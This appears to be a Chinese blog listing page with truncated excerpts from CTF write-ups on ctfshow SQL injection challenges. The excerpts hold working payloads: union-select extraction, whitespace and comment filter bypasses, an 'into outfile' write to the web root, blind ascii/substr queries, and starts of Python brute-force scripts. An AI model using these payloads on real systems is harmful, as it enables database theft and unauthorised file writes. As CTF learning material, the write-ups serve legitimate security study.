sinat_31884905的博客

1.大小过滤 176 union Union select Select 2.空格 177 /**/ 万万没想到，竟然是空格过滤有了问题，__ 这个也是空格的意思！！ 3.注释不对！！空格也被替换了 注释不要用–+ – - 用%23 空格用 %0a %0b %0c %0d %09 union select __ /**/ --+ -- - %0a %0b %0c %0d %09 ...

[x00-x7f] 匹配ASCII值从0-127的字符 0-127表示单字节字符，也就是：数字，英文字符，半角符号，以及某些控制字符。 限制了页面不能显示任何数据， ?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10 就跳到这里了，真的很神奇，所以说 select xxx from xxx into outfile '/var/

思路分析 //拼接sql语句查找指定ID用户 $sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;"; 题目给出的提示，表格给出来了就是ctfshow_user4，username就是flag 这里按理想到的回应是 1' union select 1,2，password from ctfshow_user4 where usernam

web171——常规操作~ 2' and 1=1 # 2' and 1=2 # 数据接口请求异常：parsererror 2' and 1=1 --+ 回显正常，且爆出所有信息，说明“--+”其效果了 。“#”这种注释方式不成功 2' union select 1,2,3 -- - 成功回显1，2，3 2' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=dat

1.爆破 ?id=-1/**/or/**/ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name="flag"/**/limit/**/0,1),1,1))=102

```php # -*- coding: utf-8 -*- """ Created on Fri May 21 11:23:55 2021 @author: Administrator """ import requests s=requests.session() url="http://7341d132-e805-412d-8c9e-3402d7c1e803.challenge.ctf.show:8080/index.php?id=-1'/**/" table="" for i in ran.

# -*- coding: utf-8 -*- """ Created on Fri May 21 10:51:40 2021 @author: Administrator """ import requests s=requests.session() url='http://1774ea69-f82e-4a6b-825c-3e0becd685ab.challenge.ctf.show:8080/index.php' table="" for i in range(1,45): print